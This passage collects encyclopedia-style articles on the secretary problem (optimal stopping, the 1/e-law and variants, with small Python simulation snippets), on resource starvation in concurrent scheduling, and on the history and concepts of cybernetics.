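    rng = random.Random(seed)
    cutoff = round(n / math.e)        # the ~37% rule
    return sum(run_trial(n, cutoff, rng) for _ in range(trials)) / trials
```

For n = 100 the simulated success rate comes out close to 0.37, matching the claim that the rule succeeds about 37% of the time regardless of n.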
Although there are many variations, the basic problem can be stated as follows:
A candidate is defined as an applicant who, when interviewed, is better than all the applicants interviewed previously. Skip is used to mean "reject immediately after the interview". Since the objective in the problem is to select the single best applicant, only candidates will be considered for acceptance. The "candidate" in this context corresponds to the concept of a record in a permutation.
The optimal policy for the problem is a stopping rule. Under it, the interviewer rejects the first r − 1 applicants (let applicant M be the best applicant among these r − 1 applicants), and then selects the first subsequent applicant that is better than applicant M. It can be shown that the optimal strategy lies in this class of strategies.[citation needed] (Note that we should never choose an applicant who is not the best we have seen so far, since they cannot be the best overall applicant.) For an arbitrary cutoff r, the probability that the best applicant is selected is

$$P(r) = \frac{r-1}{n} \sum_{i=r}^{n} \frac{1}{i-1}.$$
The sum is not defined for r = 1, but in this case the only feasible policy is to select the first applicant, and hence P(1) = 1/n. This sum is obtained by noting that if applicant i is the best applicant, then it is selected if and only if the best applicant among the first i − 1 applicants is among the first r − 1 applicants that were rejected. Letting n tend to infinity, writing $x$ as the limit of (r − 1)/n, using t for (i − 1)/n and dt for 1/n, the sum can be approximated by the integral

$$P(x) = x \int_{x}^{1} \frac{1}{t}\,dt = -x \ln x.$$
Taking the derivative of P(x) with respect to $x$, setting it to 0, and solving for x, we find that the optimal x is equal to 1/e. Thus, the optimal cutoff tends to n/e as n increases, and the best applicant is selected with probability 1/e.
For small values of n, the optimal r can also be obtained by standard dynamic programming methods. The optimal thresholds r and the probability of selecting the best alternative P for several values of n are shown in the following table.[note 1]
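The exact success probability and the optimal cutoff can be computed directly from the formula for P(r) (a sketch; function names are illustrative):

```python
def best_choice_probability(r, n):
    """P(r) = ((r-1)/n) * sum_{i=r}^{n} 1/(i-1), with P(1) = 1/n."""
    if r == 1:
        return 1.0 / n
    return ((r - 1) / n) * sum(1.0 / (i - 1) for i in range(r, n + 1))

def optimal_cutoff(n):
    """Return (r, P(r)) maximizing the probability of picking the best."""
    return max(((r, best_choice_probability(r, n)) for r in range(1, n + 1)),
               key=lambda pair: pair[1])
```

For n = 3 this returns r = 2 with P = 1/2, and for n = 100 it returns r = 38 with P ≈ 0.371, consistent with the convergence toward 1/e.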
The probability of selecting the best applicant in the classical secretary problem converges toward $1/e \approx 0.368$.
This problem and several modifications can be solved (including the proof of optimality) in a straightforward manner by the odds algorithm, which also has other applications. Modifications of the secretary problem that can be solved by this algorithm include random availabilities of applicants, more general hypotheses for applicants to be of interest to the decision maker, group interviews for applicants, as well as certain models for a random number of applicants.[citation needed]
The solution of the secretary problem is only meaningful if it is justified to assume that the applicants have no knowledge of the decision strategy employed, because early applicants have no chance at all and may not show up otherwise.
One important drawback for applications of the solution of the classical secretary problem is that the number of applicants n must be known in advance, which is rarely the case. One way to overcome this problem is to suppose that the number of applicants is a random variable N with a known distribution P(N = k), k = 1, 2, ⋯ (Presman and Sonin, 1972). For this model, however, the optimal solution is in general much harder to obtain. Moreover, the optimal success probability is no longer around 1/e but typically lower. This can be understood as a "price" to pay for not knowing the number of applicants, and in this model the price is high: depending on the choice of the distribution of N, the optimal win probability can approach zero. Looking for ways to cope with this new problem led to a new model yielding the so-called 1/e-law of best choice.
The essence of the model is based on the idea that life is sequential and that real-world problems pose themselves in real time. Also, it is easier to estimate the times at which specific events (arrivals of applicants) should occur more frequently (if they do) than to estimate the distribution of the number of specific events which will occur. This idea led to the following approach, the so-called unified approach (1984):
The model is defined as follows: An applicant must be selected on some time interval [0, T] from an unknown number N of rankable applicants. The goal is to maximize the probability of selecting only the best, under the hypothesis that all arrival orders of different ranks are equally likely. Suppose that all applicants have the same, but mutually independent, arrival time density f on [0, T], and let F denote the corresponding arrival time distribution function, that is,

F(t) = ∫_0^t f(s) ds, 0 ≤ t ≤ T.
Let τ be such that F(τ) = 1/e. Consider the strategy of waiting and observing all applicants up to time τ and then selecting, if possible, the first candidate after time τ who is better than all preceding ones. This strategy, called the 1/e-strategy, has the following properties:
The 1/e-strategy
The 1/e-law, proved in 1984 by F. Thomas Bruss, came as a surprise. The reason was that a value of about 1/e had previously been considered out of reach in a model with unknown N, whereas this value 1/e was now achieved as a lower bound for the success probability, and this in a model with arguably much weaker hypotheses (see e.g. Math. Reviews 85:m).
However, there are many other strategies that achieve (i) and (ii) and, moreover, perform strictly better than the 1/e-strategy simultaneously for all N > 2. A simple example is the strategy which selects (if possible) the first relatively best candidate after time τ, provided that at least one applicant arrived before this time, and otherwise selects (if possible) the second relatively best candidate after time τ.[4]
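The 1/e-strategy itself can be checked by a quick Monte-Carlo sketch. This is our own illustration, not code from Bruss's paper: arrival times are taken i.i.d. uniform on [0, 1], so F(t) = t and τ = 1/e, and applicant ranks are induced by i.i.d. quality draws.

```python
import math
import random

def one_over_e_trial(n: int, rng: random.Random) -> bool:
    """One trial of the 1/e-strategy with n applicants.
    Observe every arrival up to tau = 1/e, then select the first
    later arrival that beats everything seen so far."""
    tau = 1.0 / math.e
    # (arrival time, quality) pairs, processed in arrival order.
    applicants = sorted((rng.random(), rng.random()) for _ in range(n))
    best_quality = max(q for _, q in applicants)
    best_seen = float("-inf")
    for arrival, quality in applicants:
        if arrival <= tau:
            best_seen = max(best_seen, quality)  # observe only
        elif quality > best_seen:
            return quality == best_quality  # select this candidate
    return False  # never selected anyone

rng = random.Random(42)
trials = 20000
wins = sum(one_over_e_trial(7, rng) for _ in range(trials))
print(f"empirical success rate: {wins / trials:.3f}")
```

In line with the 1/e-law, the empirical success rate stays at or above roughly 1/e ≈ 0.368 for every fixed n we try, even though the strategy never uses n.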
The 1/e-law is sometimes confused with the solution for the classical secretary problem described above because of the similar role of the number 1/e. However, in the 1/e-law, this role is more general. The result is also stronger, since it holds for an unknown number of applicants and since the model based on an arrival time distribution F is more tractable for applications.
In the article "Who solved the Secretary problem?" (Ferguson, 1989),[1] it is claimed that the secretary problem first appeared in print in Martin Gardner's February 1960 Mathematical Games column in Scientific American:
Ask someone to take as many slips of paper as he pleases, and on each slip write a different positive number. The numbers may range from small fractions of 1 to a number the size of a googol (1 followed by a hundred zeroes) or even larger. These slips are turned face down and shuffled over the top of a table. One at a time you turn the slips face up. The aim is to stop turning when you come to the number that you guess to be the largest of the series. You cannot go back and pick a previously turned slip. If you turn over all the slips, then of course you must pick the last one turned.[5]
Ferguson pointed out that the secretary game remained unsolved as a zero-sum game with two antagonistic players.[1] In this game:
There are two differences from the basic secretary problem:
Alice first writes down n numbers, which are then shuffled. So, their ordering does not matter, meaning that Alice's numbers must be an exchangeable random variable sequence X_1, X_2, ..., X_n. Alice's strategy is then just picking the trickiest exchangeable random variable sequence.
Bob's strategy is formalizable as a stopping rule τ for the sequence X_1, X_2, ..., X_n.
We say that a stopping rule τ for Bob is a relative rank stopping strategy if it depends only on the relative ranks of X_1, X_2, ..., X_n, and not on their numerical values. In other words, it is as if someone secretly intervened after Alice picked her numbers and changed each number in X_1, X_2, ..., X_n into its relative rank (breaking ties randomly). For example, 0.2, 0.3, 0.3, 0.1 is changed to 2, 3, 4, 1 or 2, 4, 3, 1 with equal probability. This makes it as if Alice played an exchangeable random permutation on {1, 2, ..., n}. Now, since the only exchangeable random permutation on {1, 2, ..., n} is the uniform distribution over all permutations of {1, 2, ..., n}, the optimal relative rank stopping strategy is the optimal stopping rule for the secretary problem, given above, with winning probability

Pr(X_τ = max_{i ∈ 1:n} X_i) = max_{r ∈ 1:n} ((r − 1)/n) Σ_{i=r}^{n} 1/(i − 1).

Alice's goal then is to make sure Bob cannot do better than the relative-rank stopping strategy.
By the rules of the game, Alice's sequence must be exchangeable, but to do well in the game, Alice should not pick it to be independent. If Alice samples the numbers independently from some fixed distribution, Bob could do better. To see this intuitively, imagine n = 2, with Alice picking both numbers from the normal distribution N(0, 1), independently. Then if Bob turns over one number and sees −3, he can quite confidently turn over the second number, and if Bob turns over one number and sees +3, he can quite confidently pick the first number. Alice can do better by picking X_1, X_2 that are positively correlated.
So the fully formal statement is as below:
Does there exist an exchangeable sequence of random variables X_1, ..., X_n such that for any stopping rule τ,

Pr(X_τ = max_{i ∈ 1:n} X_i) ≤ max_{r ∈ 1:n} ((r − 1)/n) Σ_{i=r}^{n} 1/(i − 1)?
For n = 2, if Bob plays the optimal relative-rank stopping strategy, then he has a winning probability of 1/2. Surprisingly, Alice has no minimax strategy, which is closely related to a paradox of T. Cover[6] and the two envelopes paradox. Concretely, Bob can play this strategy: sample a random number Y. If X_1 > Y, then pick X_1, else pick X_2. Now, Bob can win with probability strictly greater than 1/2. Suppose Alice's numbers are different. Then, conditional on Y ∉ [min(X_1, X_2), max(X_1, X_2)], Bob wins with probability 1/2, but conditional on Y ∈ [min(X_1, X_2), max(X_1, X_2)], Bob wins with probability 1.
Note that the random number Y can be sampled from any distribution, as long as Y ∈ [min(X_1, X_2), max(X_1, X_2)] has nonzero probability.
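The pivot strategy is easy to check by simulation. In this sketch (our own illustration, not from Ferguson's paper) Alice plays the poor choice of i.i.d. standard normals, and Bob's pivot Y is also standard normal:

```python
import random

def bob_picks_best(x1: float, x2: float, rng: random.Random) -> bool:
    """Bob's pivot strategy: draw Y; keep X1 if X1 > Y, else take X2."""
    y = rng.gauss(0.0, 1.0)  # any distribution with full support works
    chosen = x1 if x1 > y else x2
    return chosen == max(x1, x2)

rng = random.Random(7)
trials = 50000
wins = sum(
    bob_picks_best(rng.gauss(0.0, 1.0), rng.gauss(0.0, 1.0), rng)
    for _ in range(trials)
)
print(f"Bob's win rate: {wins / trials:.3f}")  # strictly above 1/2
```

Against this particular choice by Alice, all three draws are i.i.d., so Y lands between X_1 and X_2 with probability 1/3, and Bob's win rate is about 1/2 · 2/3 + 1 · 1/3 = 2/3.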
However, for any ε > 0, Alice can construct an exchangeable sequence X_1, X_2 such that Bob's winning probability is at most 1/2 + ε.[1]
But for n > 2, the answer is yes: Alice can choose random numbers (which are dependent random variables) in such a way that Bob cannot play better than using the classical stopping strategy based on the relative ranks.[7]
The remainder of the article deals again with the secretary problem for a known number of applicants.
Stein, Seale & Rapoport 2003 derived the expected success probabilities for several psychologically plausible heuristics that might be employed in the secretary problem. The heuristics they examined were:
Each heuristic has a single parameter y. The figure (shown on the right) displays the expected success probabilities for each heuristic as a function of y for problems with n = 80.
Finding the single best applicant might seem like a rather strict objective. One can imagine that the interviewer would rather hire a higher-valued applicant than a lower-valued one, and not only be concerned with getting the best. That is, the interviewer will derive some value from selecting an applicant that is not necessarily the best, and the derived value increases with the value of the one selected.
To model this problem, suppose that the n applicants have "true" values that are random variables X drawn i.i.d. from a uniform distribution on [0, 1]. Similar to the classical problem described above, the interviewer only observes whether each applicant is the best so far (a candidate), must accept or reject each on the spot, and must accept the last one if he/she is reached. (To be clear, the interviewer does not learn the actual relative rank of each applicant; he/she learns only whether the applicant has relative rank 1.) However, in this version the payoff is given by the true value of the selected applicant. For example, if he/she selects an applicant whose true value is 0.8, then he/she will earn 0.8. The interviewer's objective is to maximize the expected value of the selected applicant.
Since the applicants' values are i.i.d. draws from a uniform distribution on [0, 1], the expected value of the tth applicant, given that x_t = max{x_1, x_2, …, x_t}, is given by

E[x_t | x_t = max{x_1, …, x_t}] = t/(t + 1),

since the maximum of t i.i.d. uniform draws on [0, 1] has expectation t/(t + 1).
As in the classical problem, the optimal policy is given by a threshold, which for this problem we will denote by c, at which the interviewer should begin accepting candidates. Bearden showed that c is either ⌊√n⌋ or ⌈√n⌉ (in fact, whichever is closest to √n).[8] This follows from the fact that, given a problem with n applicants, the expected payoff for an arbitrary threshold 1 ≤ c ≤ n is

V_n(c) = (2cn − c² + c − n) / (2cn).
Differentiating V_n(c) with respect to c, one gets

∂V/∂c = 1/(2c²) − 1/(2n).
Since ∂²V/∂c² < 0 for all permissible values of c, we find that V is maximized at c = √n. Since V is concave in c, the optimal integer-valued threshold must be either ⌊√n⌋ or ⌈√n⌉. Thus, for most values of n the interviewer will begin accepting applicants sooner in the cardinal payoff version than in the classical version, where the objective is to select the single best applicant. Note that this is not an asymptotic result: it holds for all n. Interestingly, if each of the n secretaries has a fixed, distinct value from 1 to n, then V is maximized at c = √n − 1, with the same concavity claims as before.[9] For other known distributions, optimal play can be calculated via dynamic programming.
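The √n threshold can be checked numerically. The sketch below uses the closed-form payoff V_n(c) = (2cn − c² + c − n)/(2cn) for the uniform case (our reconstruction of the formula; the function names are ours) and finds the maximising integer threshold by direct search:

```python
import math

def expected_payoff(c: int, n: int) -> float:
    """Closed-form V_n(c) for threshold c, values i.i.d. uniform on [0, 1]."""
    return (2 * c * n - c * c + c - n) / (2 * c * n)

def optimal_threshold(n: int) -> int:
    """Integer c maximising V_n(c)."""
    return max(range(1, n + 1), key=lambda c: expected_payoff(c, n))

for n in (4, 10, 50):
    print(n, optimal_threshold(n), round(math.sqrt(n), 2))
# The maximiser is the integer nearest to sqrt(n), e.g. 2 for n = 4.
```

Note that differentiating this V gives ∂V/∂c = 1/(2c²) − 1/(2n), which vanishes exactly at c = √n, consistent with Bearden's result.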
A more general form of this problem introduced by Palley and Kremer (2014)[10] assumes that as each new applicant arrives, the interviewer observes their rank relative to all of the applicants that have been observed previously. This model is consistent with the notion of an interviewer learning as they continue the search process by accumulating a set of past data points that they can use to evaluate new candidates as they arrive. A benefit of this so-called partial-information model is that decisions and outcomes achieved given the relative rank information can be directly compared to the corresponding optimal decisions and outcomes if the interviewer had been given full information about the value of each applicant. This full-information problem, in which applicants are drawn independently from a known distribution and the interviewer seeks to maximize the expected value of the applicant selected, was originally solved by Moser (1956),[11] Sakaguchi (1961),[12] and Karlin (1962).
There are several variants of the secretary problem that also have simple and elegant solutions.
One variant replaces the desire to pick the best with the desire to pick the second-best.[13][14][15] For this problem, the probability of success for an even number of applicants is exactly 0.25n²/(n(n − 1)). This probability tends to 1/4 as n tends to infinity, illustrating the fact that it is easier to pick the best than the second-best.
Consider the problem of picking the k best secretaries out of n candidates, using k tries.
In general, the optimal decision method starts by observing r = ⌊n/(k·e^{1/k})⌋ candidates without picking any one of them, then picks every candidate that is better than those first r candidates until we run out of candidates or picks. If k is held constant while n → ∞, the probability of success converges to 1/(ek).[16] By Vanderbei 1980, if k = n/2, then the probability of success is 1/(n/2 + 1).
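The cutoff r = ⌊n/(k·e^{1/k})⌋ is straightforward to evaluate; for k = 1 it reduces to the classical ⌊n/e⌋ (the function name below is ours):

```python
import math

def observation_cutoff(n: int, k: int) -> int:
    """Number of candidates observed (but not picked) before the
    picking phase starts: r = floor(n / (k * e^(1/k)))."""
    return math.floor(n / (k * math.exp(1.0 / k)))

print(observation_cutoff(100, 1))  # classical single-pick case: floor(100/e) = 36
print(observation_cutoff(100, 2))  # with two picks the observation phase is shorter
```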
In this variant, a player is allowed r choices and wins if any choice is the best. An optimal strategy for this problem belongs to the class of strategies defined by a set of threshold numbers (a_1, a_2, ..., a_r), where a_1 > a_2 > ⋯ > a_r.
Specifically, imagine that you have r letters of acceptance labelled from 1 to r, and r application officers, each holding one letter. You keep interviewing the candidates and rank them on a chart that every application officer can see. Officer i sends their letter of acceptance to the first candidate that is better than all candidates 1 to a_i. (Unsent letters of acceptance are by default given to the last applicants, the same as in the standard secretary problem.)[17]
In the n → ∞ limit, each a_i ∼ n·e^{−k_i} for some rational number k_i.[18]
When r = 2, the probability of winning converges to e^{−1} + e^{−3/2} as n → ∞. More generally, for positive integers r, the probability of winning converges to p_1 + p_2 + ⋯ + p_r, where p_i = lim_{n→∞} a_i/n.[18]
The cases up to r = 4 have been computed,[17] giving the limit e^{−1} + e^{−3/2} + e^{−47/24} + e^{−2761/1152}.
Matsui & Ano 2016 gave a general algorithm. For example, p_5 = e^{−4162637/1474560}.
Experimental psychologists and economists have studied the decision behavior of actual people in secretary problem situations.[19] In large part, this work has shown that people tend to stop searching too soon. This may be explained, at least in part, by the cost of evaluating candidates. In real-world settings, this might suggest that people do not search enough whenever they are faced with problems where the decision alternatives are encountered sequentially. For example, when trying to decide at which gas station along a highway to stop for gas, people might not search enough before stopping. If true, then they would tend to pay more for gas than if they had searched longer. The same may be true when people search online for airline tickets. Experimental research on problems such as the secretary problem is sometimes referred to as behavioral operations research.
While there is a substantial body of neuroscience research on information integration, or the representation of belief, in perceptual decision-making tasks using both animal[20][21] and human subjects,[22] there is relatively little known about how the decision to stop gathering information is arrived at.
Researchers have studied the neural bases of solving the secretary problem in healthy volunteers using functional MRI.[23] A Markov decision process (MDP) was used to quantify the value of continuing to search versus committing to the current option. Decisions to take versus decline an option engaged parietal and dorsolateral prefrontal cortices, as well as the ventral striatum, anterior insula, and anterior cingulate. Therefore, brain regions previously implicated in evidence integration and reward representation encode threshold crossings that trigger decisions to commit to a choice.
The secretary problem was apparently introduced in 1949 by Merrill M. Flood, who called it the fiancée problem in a lecture he gave that year. He referred to it several times during the 1950s, for example in a conference talk at Purdue on 9 May 1958, and it eventually became widely known in the folklore, although nothing was published at the time. In 1958 he sent a letter to Leonard Gillman, with copies to a dozen friends including Samuel Karlin and J. Robbins, outlining a proof of the optimum strategy, with an appendix by R. Palermo, who proved that all strategies are dominated by a strategy of the form "reject the first p unconditionally, then accept the next candidate who is better".[24]
The first publication was apparently by Martin Gardner in Scientific American, February 1960. He had heard about it from John H. Fox Jr. and L. Gerald Marnie, who had independently come up with an equivalent problem in 1958; they called it the "game of googol". Fox and Marnie did not know the optimum solution; Gardner asked for advice from Leo Moser, who (together with J. R. Pounder) provided a correct analysis for publication in the magazine. Soon afterwards, several mathematicians wrote to Gardner to tell him about the equivalent problem they had heard via the grapevine, all of which can most likely be traced to Flood's original work.[25]
The 1/e-law of best choice is due to F. Thomas Bruss.[26]
Ferguson has an extensive bibliography and points out that a similar (but different) problem had been considered by Arthur Cayley in 1875, and even by Johannes Kepler long before that, who spent two years investigating 11 candidates for marriage during 1611–1613 after the death of his first wife.[27]
The secretary problem can be generalized to the case where there are multiple different jobs. Again, there are n applicants coming in random order. When an applicant arrives, they reveal a set of nonnegative numbers, each specifying their qualification for one of the jobs. The administrator not only has to decide whether or not to take the applicant but, if so, also has to assign them permanently to one of the jobs. The objective is to find an assignment where the sum of qualifications is as big as possible. This problem is identical to finding a maximum-weight matching in an edge-weighted bipartite graph where the n nodes of one side arrive online in random order. Thus, it is a special case of the online bipartite matching problem.
By a generalization of the classic algorithm for the secretary problem, it is possible to obtain an assignment where the expected sum of qualifications is only a factor of e less than an optimal (offline) assignment.[28]
https://en.wikipedia.org/wiki/Secretary_problem
In computer science, resource starvation is a problem encountered in concurrent computing where a process is perpetually denied necessary resources to process its work.[1] Starvation may be caused by errors in a scheduling or mutual exclusion algorithm, but can also be caused by resource leaks, and can be intentionally caused via a denial-of-service attack such as a fork bomb.
When starvation is impossible in a concurrent algorithm, the algorithm is called starvation-free, lockout-freed[2] or said to have finite bypass.[3] This property is an instance of liveness, and is one of the two requirements for any mutual exclusion algorithm, the other being correctness. The name "finite bypass" means that any process (concurrent part) of the algorithm is bypassed at most a finite number of times before being allowed access to the shared resource.[3]
Starvation is usually caused by an overly simplistic scheduling algorithm. For example, if a (poorly designed) multi-tasking system always switches between the first two tasks while a third never gets to run, then the third task is being starved of CPU time. The scheduling algorithm, which is part of the kernel, is supposed to allocate resources equitably; that is, the algorithm should allocate resources so that no process perpetually lacks necessary resources.
Many operating system schedulers employ the concept of process priority. A high-priority process A will run before a low-priority process B. If the high-priority process (process A) blocks and never yields, the low-priority process (B) will (in some systems) never be scheduled: it will experience starvation. If there is an even higher-priority process X, which is dependent on a result from process B, then process X might never finish, even though it is the most important process in the system. This condition is called a priority inversion. Modern scheduling algorithms normally contain code to guarantee that all processes will receive a minimum amount of each important resource (most often CPU time) in order to prevent any process from being subjected to starvation.
In computer networks, especially wireless networks, scheduling algorithms may suffer from scheduling starvation. An example is maximum throughput scheduling.
Starvation is similar to deadlock in that it causes a process to freeze. Two or more processes become deadlocked when each of them is doing nothing while waiting for a resource occupied by another program in the same set. On the other hand, a process is in starvation when it is waiting for a resource that is continuously given to other processes. Starvation-freedom is a stronger guarantee than the absence of deadlock: a mutual exclusion algorithm that must choose to allow one of two processes into a critical section and picks one arbitrarily is deadlock-free, but not starvation-free.[3]
A possible solution to starvation is to use a scheduling algorithm with a priority queue that also uses the aging technique. Aging is a technique of gradually increasing the priority of processes that wait in the system for a long time.[4]
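A toy priority scheduler (our own sketch, not taken from any real operating system) shows both the starvation problem and the aging fix: with aging disabled, a low-priority task never runs, while with aging enabled it eventually does.

```python
import heapq

def schedule(tasks, quanta, aging=1):
    """Toy priority scheduler. tasks: list of (name, priority), where a
    lower number means higher priority. Each quantum the best task runs
    and is re-queued at its original priority, while every still-waiting
    task's effective priority improves by `aging`. Returns the run order."""
    base = dict(tasks)
    heap = [(prio, i, name) for i, (name, prio) in enumerate(tasks)]
    heapq.heapify(heap)
    order = []
    for _ in range(quanta):
        prio, i, name = heapq.heappop(heap)
        order.append(name)
        # Age everything still waiting, then re-queue the task that just ran.
        heap = [(p - aging, j, m) for p, j, m in heap]
        heapq.heapify(heap)
        heapq.heappush(heap, (base[name], i, name))
    return order

tasks = [("A", 0), ("B", 0), ("C", 5)]
print(schedule(tasks, quanta=12))           # C eventually runs thanks to aging
print(schedule(tasks, quanta=12, aging=0))  # without aging, C is starved forever
```

With `aging=0`, the two priority-0 tasks monopolise the CPU and "C" never appears in the run order, which is exactly the starvation scenario described above.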
https://en.wikipedia.org/wiki/Resource_starvation
Cybernetics is the transdisciplinary study of circular causal[1] processes such as feedback and recursion, where the effects of a system's actions (its outputs) return as inputs to that system, influencing subsequent action.[2] It is concerned with general principles that are relevant across multiple contexts,[3] including in engineering, ecological, economic, biological, cognitive and social systems, and also in practical activities such as designing,[4] learning, and managing. Cybernetics' transdisciplinary[5] character has meant that it intersects with a number of other fields, leading to it having both wide influence and diverse interpretations.
The field is named after an example of circular causal feedback: that of steering a ship (the ancient Greek κυβερνήτης (kybernḗtēs) refers to the person who steers a ship). In steering a ship, the position of the rudder is adjusted in continual response to the effect it is observed as having, forming a feedback loop through which a steady course can be maintained in a changing environment, responding to disturbances from cross winds and tide.[6][7]
Cybernetics has its origins in exchanges between numerous disciplines during the 1940s. Initial developments were consolidated through meetings such as the Macy Conferences and the Ratio Club. Early focuses included purposeful behaviour,[8] neural networks, heterarchy, information theory, and self-organising systems.[9] As cybernetics developed, it became broader in scope to include work in design, family therapy, management and organisation, pedagogy, sociology, the creative arts and the counterculture.[10]
Cybernetics has been defined in a variety of ways, reflecting "the richness of its conceptual base."[11] One of the best known definitions is that of the American scientist Norbert Wiener, who characterised cybernetics as concerned with "control and communication in the animal and the machine."[12] Another early definition is that of the Macy cybernetics conferences, where cybernetics was understood as the study of "circular causal and feedback mechanisms in biological and social systems."[13] Margaret Mead emphasised the role of cybernetics as "a form of cross-disciplinary thought which made it possible for members of many disciplines to communicate with each other easily in a language which all could understand."[14]
Other definitions include:[15] "the art of governing or the science of government" (André-Marie Ampère); "the art of steersmanship" (Ross Ashby); "the study of systems of any nature which are capable of receiving, storing, and processing information so as to use it for control" (Andrey Kolmogorov); and "a branch of mathematics dealing with problems of control, recursiveness, and information, focuses on forms and the patterns that connect" (Gregory Bateson).
The Ancient Greek term κυβερνητικός (kubernētikos, '(good at) steering') appears in Plato's Republic[16] and Alcibiades, where the metaphor of a steersman is used to signify the governance of people.[17] The French word cybernétique was also used in 1834 by the physicist André-Marie Ampère to denote the sciences of government in his classification system of human knowledge.
According to Norbert Wiener, the word cybernetics was coined by a research group involving himself and Arturo Rosenblueth in the summer of 1947.[12] It has been attested in print since at least 1948 through Wiener's book Cybernetics: Or Control and Communication in the Animal and the Machine.[note 1] In the book, Wiener states:
After much consideration, we have come to the conclusion that all the existing terminology has too heavy a bias to one side or another to serve the future development of the field as well as it should; and as happens so often to scientists, we have been forced to coin at least one artificial neo-Greek expression to fill the gap. We have decided to call the entire field of control and communication theory, whether in the machine or in the animal, by the name Cybernetics, which we form from the Greek κυβερνήτης or steersman.
Moreover, Wiener explains, the term was chosen to recognize James Clerk Maxwell's 1868 publication on feedback mechanisms involving governors, noting that the term governor is also derived from κυβερνήτης (kubernḗtēs) via a Latin corruption, gubernator. Finally, Wiener motivates the choice by the steering engines of a ship being "one of the earliest and best-developed forms of feedback mechanisms".[12]
The initial focus of cybernetics was on parallels between regulatory feedback processes in biological and technological systems. Two foundational articles were published in 1943: "Behavior, Purpose and Teleology" by Arturo Rosenblueth, Norbert Wiener, and Julian Bigelow, based on the research on living organisms that Rosenblueth did in Mexico, and the paper "A Logical Calculus of the Ideas Immanent in Nervous Activity" by Warren McCulloch and Walter Pitts. The foundations of cybernetics were then developed through a series of transdisciplinary conferences funded by the Josiah Macy, Jr. Foundation between 1946 and 1953. The conferences were chaired by McCulloch, and participants included Ross Ashby, Gregory Bateson, Heinz von Foerster, Margaret Mead, John von Neumann, and Norbert Wiener. In the UK, similar focuses were explored by the Ratio Club, an informal dining club of young psychiatrists, psychologists, physiologists, mathematicians and engineers that met between 1949 and 1958. Wiener introduced the neologism cybernetics to denote the study of "teleological mechanisms" and popularized it through the book Cybernetics: Or Control and Communication in the Animal and the Machine.[12]
During the 1950s, cybernetics was developed as a primarily technical discipline, as in Qian Xuesen's 1954 Engineering Cybernetics. In the Soviet Union, cybernetics was initially regarded with suspicion[19] but became accepted from the mid to late 1950s.
By the 1960s and 1970s, however, cybernetics' transdisciplinarity fragmented, with technical focuses separating into distinct fields. Artificial intelligence (AI) was founded as a distinct discipline at the Dartmouth workshop in 1956, differentiating itself from the broader cybernetics field. After some uneasy coexistence, AI gained funding and prominence. Consequently, cybernetic sciences such as the study of artificial neural networks were downplayed.[20] Similarly, computer science became defined as a distinct academic discipline in the 1950s and early 1960s.[21]
The second wave of cybernetics came to prominence from the 1960s onwards, with its focus inflecting away from technology toward social, ecological, and philosophical concerns. It was still grounded in biology, notably Maturana and Varela's autopoiesis, and built on earlier work on self-organising systems and the presence of anthropologists Mead and Bateson in the Macy meetings. The Biological Computer Laboratory, founded in 1958 and active until the mid-1970s under the direction of Heinz von Foerster at the University of Illinois at Urbana–Champaign, was a major incubator of this trend in cybernetics research.[22]
Focuses of the second wave of cybernetics included management cybernetics, such as Stafford Beer's biologically inspired viable system model; work in family therapy, drawing on Bateson; social systems, such as in the work of Niklas Luhmann; and epistemology and pedagogy, such as in the development of radical constructivism.[23] Cybernetics' core theme of circular causality was developed beyond goal-oriented processes to concerns with reflexivity and recursion. This was especially so in the development of second-order cybernetics (or the cybernetics of cybernetics), developed and promoted by Heinz von Foerster, which focused on questions of observation, cognition, epistemology, and ethics.
The 1960s onwards also saw cybernetics begin to develop exchanges with the creative arts, design, and architecture, notably with the Cybernetic Serendipity exhibition (ICA, London, 1968), curated by Jasia Reichardt,[24][25] and the unrealised Fun Palace project (London, 1964 onwards), where Gordon Pask was consultant to architect Cedric Price and theatre director Joan Littlewood.[26]
From the 1990s onwards, there has been a renewed interest in cybernetics from a number of directions. Early cybernetic work on artificial neural networks has been returned to as a paradigm in machine learning and artificial intelligence. The entanglements of society with emerging technologies have led to exchanges with feminist technoscience and posthumanism. Re-examinations of cybernetics' history have seen science studies scholars emphasising cybernetics' unusual qualities as a science, such as its "performative ontology".[27] Practical design disciplines have drawn on cybernetics for theoretical underpinning and transdisciplinary connections. Emerging topics include how cybernetics' engagements with social, human, and ecological contexts might come together with its earlier technological focus, whether as a critical discourse[28][29] or a "new branch of engineering".[30]
The central theme in cybernetics is feedback. Feedback is a process in which the observed outcomes of actions are taken as inputs for further action, in ways that support the pursuit, maintenance, or disruption of particular conditions, forming a circular causal relationship. In steering a ship, the helmsperson maintains a steady course in a changing environment by adjusting their steering in continual response to the effect it is observed as having.[6]
Other examples of circular causal feedback include: technological devices such as the thermostat, where the action of a heater responds to measured changes in temperature, regulating the temperature of the room within a set range, and the centrifugal governor of a steam engine, which regulates the engine speed; biological examples such as the coordination of volitional movement through the nervous system and the homeostatic processes that regulate variables such as blood sugar; and processes of social interaction such as conversation.[31]
Negative feedback processes are those that maintain particular conditions by reducing (hence 'negative') the difference from a desired state, such as when a thermostat turns on a heater when it is too cold and turns the heater off when it is too hot. Positive feedback processes increase (hence 'positive') the difference from a desired state. An example of positive feedback is when a microphone picks up the sound that it is producing through a speaker, which is then played through the speaker again, and so on.
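The thermostat's negative-feedback loop can be sketched in a few lines. This is a minimal illustration, not a description of any real device: the setpoint, switching band, and heating/cooling rates below are all assumed values chosen only to show the behaviour.

```python
# Minimal sketch of a thermostat as a negative-feedback loop: the controller
# acts to reduce the difference between the measured temperature and the
# desired state. Setpoint, band, and rates are hypothetical illustration values.

def thermostat_step(temp, setpoint, heater_on):
    """One control cycle: switch the heater based on the observed temperature."""
    if temp < setpoint - 0.5:      # too cold -> turn heater on
        heater_on = True
    elif temp > setpoint + 0.5:    # too warm -> turn heater off
        heater_on = False
    # Heating raises the temperature; otherwise the room slowly cools.
    temp += 0.8 if heater_on else -0.3
    return temp, heater_on

temp, heater_on = 12.0, False
for _ in range(40):
    temp, heater_on = thermostat_step(temp, setpoint=20.0, heater_on=heater_on)
# The loop settles the temperature into a narrow band around the setpoint.
```

Removing the `elif` branch (never switching the heater off) would turn the same loop into a runaway process, which is the qualitative difference between negative and positive feedback described above.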
In addition to feedback, cybernetics is concerned with other forms of circular processes, including feedforward, recursion, and reflexivity.
Other key concepts and theories in cybernetics include:
Cybernetics' central concept of circular causality is of wide applicability, leading to diverse applications and relations with other fields. Many of the initial applications of cybernetics focused on engineering, biology, and exchanges between the two, such as medical cybernetics and robotics, and topics such as neural networks and heterarchy.[35] In the social and behavioral sciences, cybernetics has included and influenced work in anthropology, sociology, economics, family therapy,[36] cognitive science, and psychology.[37][38]
